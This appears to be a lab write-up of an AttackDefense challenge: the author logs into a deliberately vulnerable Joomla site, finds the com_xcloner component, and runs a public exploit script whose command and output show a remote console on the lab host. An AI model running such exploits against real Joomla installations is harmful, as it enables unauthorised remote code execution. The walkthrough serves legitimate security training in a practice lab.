Image of AttackDefense 2018

Mission

A version of Joomla com_xcloner Component is vulnerable to remote code execution attack. Your task is to find and exploit this vulnerability.

The following username and password may be used to explore the application and create regular users if required to exploit authenticated access vulnerabilities:

  • User: admin
  • Password: password

Level difficulty: Easy

Category: Real World Webapps > Remote Code Execution

Solution

First I was provided with the following Joomla website:

Image of AttackDefense 2018

By using the username and password that were given to me at the start of this challenge, I have obtained access to the Joomla Control Panel:

Image of AttackDefense 2018

There I was able to discover the installed version of Joomla Core:

Image of AttackDefense 2018

Even if I tried multiple known remote code execution exploits for Joomla Core version 1.6.0, I was unable to get any command execution on the target website. Therefore, I took in account the following provided information:

Joomla com_xcloner Component

This simple statement transmitted me to search on Google for exploits applicable to Joomla com_xcloner Component and to my surprise, I have obtained the following:

Image of AttackDefense 2018

After downloading the exploit and running it against the target website, I have obtained the following:

lucian@local:~/Downloads$ python 16246.py -t ie9i8y5pobnhaf1u7vhg8egbt.public2.attackdefenselabs.com:80 -d /joomla/

	| ----------------------------------------------------------------------------- |
	| Joomla component (com_xcloner-backupandrestore) remote code execution explo!t |
	| by mr_me - net-ninja.net ---------------------------------------------------- |

(+) Targeting http://ie9i8y5pobnhaf1u7vhg8egbt.public2.attackdefenselabs.com:80/joomla/
(!) Exploit working!
(+) Droping to remote console (q for quit)

lucian@ie9i8y5pobnhaf1u7vhg8egbt.public2.attackdefenselabs.com:80# 

The last thing was to prove that I have finished the challenge:

Image of AttackDefense 2018

Image of AttackDefense 2018